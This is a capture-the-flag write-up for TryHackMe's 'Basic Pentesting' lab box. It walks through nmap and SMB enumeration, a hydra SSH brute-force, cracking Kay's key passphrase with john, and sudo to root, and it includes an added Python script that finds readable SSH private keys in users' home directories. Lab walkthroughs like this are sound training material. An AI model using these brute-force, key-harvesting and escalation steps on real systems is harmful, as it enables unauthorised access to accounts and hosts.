TryHackMe — Basic Pentesting Writeup
TL;DR: This is a Linux box with a webserver and an SMB share that reveal usernames. We can use these to brute-force Jan's SSH password and log in. We can escalate to Kay (another user) by retrieving Kay's passphrase-protected SSH private key, cracking the passphrase, and logging back in as Kay. Finally, we can abuse Kay's sudo rights to switch to root.
Scanning:
Let's start with a Nmap scan.
# Command: nmap -T4 -A -p- -Pn 10.10.142.236 -oA nmap_full
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-25 18:52 IST
Nmap scan report for 10.10.137.12
Host is up (0.16s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
| 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.7
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/9.0.7
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=6/25%OT=22%CT=1%CU=33797%PV=Y%DS=2%DC=T%G=Y%TM=60D5DA8
OS:9%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=108%TI=Z%CI=I%II=I%TS=8)OPS
OS:(O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST1
OS:1NW7%O6=M505ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN
OS:(R=Y%DF=Y%T=40%W=6903%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)
Network Distance: 2 hops
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h20m01s, deviation: 2h18m33s, median: 1s
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: basic2
| NetBIOS computer name: BASIC2\x00
| Domain name: \x00
| FQDN: basic2
|_ System time: 2021-06-25T09:30:45-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-06-25T13:30:45
|_ start_date: N/A
TRACEROUTE (using port 1723/tcp)
HOP RTT ADDRESS
1 161.14 ms 10.11.0.1
2 161.20 ms 10.10.137.12
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 476.57 seconds
So a total of 6 ports are open:
- Port 22 — OpenSSH 7.2p2
- Port 80 — Apache httpd 2.4.18
- Port 139 — netbios-ssn Samba smbd 3.X — 4.X
- Port 445 — netbios-ssn Samba smbd 4.3.11-Ubuntu
- Port 8009 — Apache Jserv AJP13
- Port 8080 — Apache Tomcat 9.0.7
Reconnaissance:
Port 80 — Apache Webserver:
Visiting the site, we see an under-maintenance message.
But the page source reveals something.
It seems there is a dev section that contains notes on what is going to be done with this service.
Let's find this directory using dirsearch.
Let's check the /development folder.
Let's look at the contents of these files.
So we can conclude that user J has a weak password. We could brute-force it, but first we need to find what J stands for, i.e. the actual username.
Port 139,445 — Samba:
Let’s see what shares are available using smbmap.
The Anonymous share is readable, let’s access it using smbclient.
There’s a file on this share, let’s download it.
Checking its contents,
We see that this message is from Kay to the staff, but it singles out one member, Jan. These names match the initials K and J from dev.txt and j.txt on the webserver.
We have likely found the username, so let's try brute-forcing Jan's password to log in over SSH.
Exploitation (Low Privilege User):
We can brute force Jan’s SSH password using Hydra.
Syntax: hydra -l {username} -P {path_to_password_wordlist} -t {number_of_threads} {target} ssh
# Command: hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.142.236 -t 4 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-25 19:50:58
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ssh://10.10.142.236:22/
[STATUS] 44.00 tries/min, 44 tries in 00:01h, 14344355 to do in 5433:29h, 4 active
[STATUS] 28.00 tries/min, 84 tries in 00:03h, 14344315 to do in 8538:17h, 4 active
[STATUS] 29.14 tries/min, 204 tries in 00:07h, 14344195 to do in 8203:23h, 4 active
[STATUS] 27.47 tries/min, 412 tries in 00:15h, 14343987 to do in 8703:53h, 4 active
[22][ssh] host: 10.10.142.236 login: jan password: armando
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-06-25 20:19:22
We've found the password; let's log in using SSH.
Privilege Escalation to Kay:
Checking the contents of /home, we see the other user Kay’s folder.
Let’s check the contents of kay’s home folder.
3 files immediately stand out,
- .lesshst — Owned by root, but we cannot read this file
- pass.bak — Hints at being a password. Owned by root, but we cannot read this file
- .ssh — Owned by Kay. But we can actually access this directory.
Let's check the contents of Kay's .ssh directory.
Kay's private key is readable by us, so we can save a copy and use it to log in as Kay.
But while copying the private key, I noticed that it is encrypted with a passphrase. We don't have that passphrase, so we will have to crack it using john.
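As an added example (not code from the original writeup), the Python below does the same check programmatically for every home directory: it walks each user's .ssh, reports which private keys the current user can read, and says whether each one is passphrase-protected. For legacy PEM keys it reads the Proc-Type and DEK-Info headers, which carry the cipher name and IV that ssh2john later turns into a hash for john; for the newer OPENSSH PRIVATE KEY format it decodes the blob and reads the ciphername field, where "none" means no passphrase. `demo()` builds a constructed temporary home tree with dummy key headers (not the real key from the box) so the script runs offline; the usernames and file names in it are assumptions.

```python
"""Find private keys readable in other users' ~/.ssh and say whether each is
passphrase-protected.  Added example for this writeup, not part of the
original post; demo() builds a constructed home tree with dummy key headers
(not the real key from the box) so that it runs offline.
"""
import base64
import os
import struct
import tempfile

OPENSSH_MAGIC = b"openssh-key-v1\x00"  # prefix of the "OPENSSH PRIVATE KEY" blob


def key_info(text):
    """Classify key text as (format, encrypted, cipher, iv_hex); None if not a key."""
    if "PRIVATE KEY" not in text:
        return None
    if "BEGIN OPENSSH PRIVATE KEY" in text:
        body = "".join(l for l in text.splitlines() if not l.startswith("-----"))
        blob = base64.b64decode(body)
        if not blob.startswith(OPENSSH_MAGIC):
            return ("openssh", None, None, None)
        # A length-prefixed ciphername follows the magic; "none" means unencrypted.
        off = len(OPENSSH_MAGIC)
        (n,) = struct.unpack(">I", blob[off:off + 4])
        cipher = blob[off + 4:off + 4 + n].decode()
        return ("openssh", cipher != "none", cipher, None)
    # Legacy PEM: encryption is announced in the Proc-Type / DEK-Info headers,
    # which also carry the cipher and IV that ssh2john turns into a john hash.
    encrypted, cipher, iv = False, None, None
    for line in text.splitlines():
        if line.startswith("Proc-Type:") and "ENCRYPTED" in line:
            encrypted = True
        elif line.startswith("DEK-Info:"):
            cipher, _, iv = line.split(":", 1)[1].strip().partition(",")
    return ("pem", encrypted, cipher, iv or None)


def readable_private_keys(home_root):
    """Walk <home_root>/<user>/.ssh and return keys the current user can read.

    Each entry is (user, path, format, encrypted, cipher, iv_hex).  Caveat:
    os.access() answers True for everything when running as root.
    """
    found = []
    for user in sorted(os.listdir(home_root)):
        ssh_dir = os.path.join(home_root, user, ".ssh")
        if not os.path.isdir(ssh_dir) or not os.access(ssh_dir, os.R_OK | os.X_OK):
            continue
        for name in sorted(os.listdir(ssh_dir)):
            path = os.path.join(ssh_dir, name)
            if not os.path.isfile(path) or not os.access(path, os.R_OK):
                continue
            with open(path, errors="replace") as fh:
                info = key_info(fh.read())
            if info is not None:
                found.append((user, path) + info)
    return found


# Constructed fixture (dummy material, not a real key): a legacy PEM key whose
# headers announce an AES-128-CBC passphrase, as ssh2john expects to find them.
LEGACY_ENCRYPTED = (
    "-----BEGIN RSA PRIVATE KEY-----\n"
    "Proc-Type: 4,ENCRYPTED\n"
    "DEK-Info: AES-128-CBC,0102030405060708090A0B0C0D0E0F10\n"
    "\n"
    "QUJDREVGR0hJSktMTU5PUA==\n"
    "-----END RSA PRIVATE KEY-----\n"
)


def openssh_header(cipher):
    """Build just the start of an openssh-key-v1 blob: magic, ciphername, kdf."""
    blob = OPENSSH_MAGIC + struct.pack(">I", len(cipher)) + cipher.encode()
    blob += struct.pack(">I", 4) + b"none" + struct.pack(">I", 0)  # kdfname, kdfoptions
    b64 = base64.b64encode(blob).decode()
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{b64}\n-----END OPENSSH PRIVATE KEY-----\n"


def demo():
    """Populate a temporary /home look-alike and scan it (assumed users/files)."""
    root = tempfile.mkdtemp(prefix="home-")
    tree = {
        "jan": {"id_ed25519": openssh_header("none")},       # no passphrase
        "kay": {"id_rsa": LEGACY_ENCRYPTED,                  # passphrase, legacy PEM
                "id_rsa.pub": "ssh-rsa AAAA kay@basic2\n"},  # public key, ignored
        "ops": {"id_rsa": openssh_header("aes256-ctr")},     # passphrase, new format
    }
    for user, files in tree.items():
        ssh_dir = os.path.join(root, user, ".ssh")
        os.makedirs(ssh_dir)
        for name, content in files.items():
            with open(os.path.join(ssh_dir, name), "w") as fh:
                fh.write(content)
    return readable_private_keys(root)


if __name__ == "__main__":
    # On a real box call readable_private_keys("/home") instead of demo().
    for user, path, fmt, enc, cipher, iv in demo():
        print(f"{user:5} {fmt:8} encrypted={enc!s:5} cipher={cipher} iv={iv} {path}")
```

On the target you would call `readable_private_keys("/home")` as the low-privilege user; a key that comes back with `encrypted=False` can be used as-is, while one with `encrypted=True` is a candidate for ssh2john and john, and the reported cipher tells you in advance how slow that crack will be.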
Cracking the key for Kay’s Private Key:
After copying the key to the attacker's machine, we first have to convert it into a hash format that john accepts. To do this, we can use the ssh2john tool.
Now we can crack the converted hash using john with rockyou.txt as the wordlist.
We've found the passphrase, so now we can log in as Kay.
Logging in as Kay:
When we try to SSH in as kay with the private key, we are prompted for its passphrase.
Enter the passphrase beeswax that we found using john, and we are logged in as Kay.
Privilege Escalation to root:
Now we can read pass.bak.
It's safe to assume that this is kay's password. We can validate this by exiting SSH and logging back in with this password instead of the key.
Since we have kay's password, let's check whether kay has any sudo rights with sudo -l.
So kay can run everything using sudo. We can simply run sudo su to switch to root.
And that was Basic Pentesting guys, thanks for reading my write-up. If you have any suggestions or think I missed something, please do let me know in the comments. If you have any other suggestions or questions, feel free to message me.
If you want to reach me,
Twitter: @MathewSeelan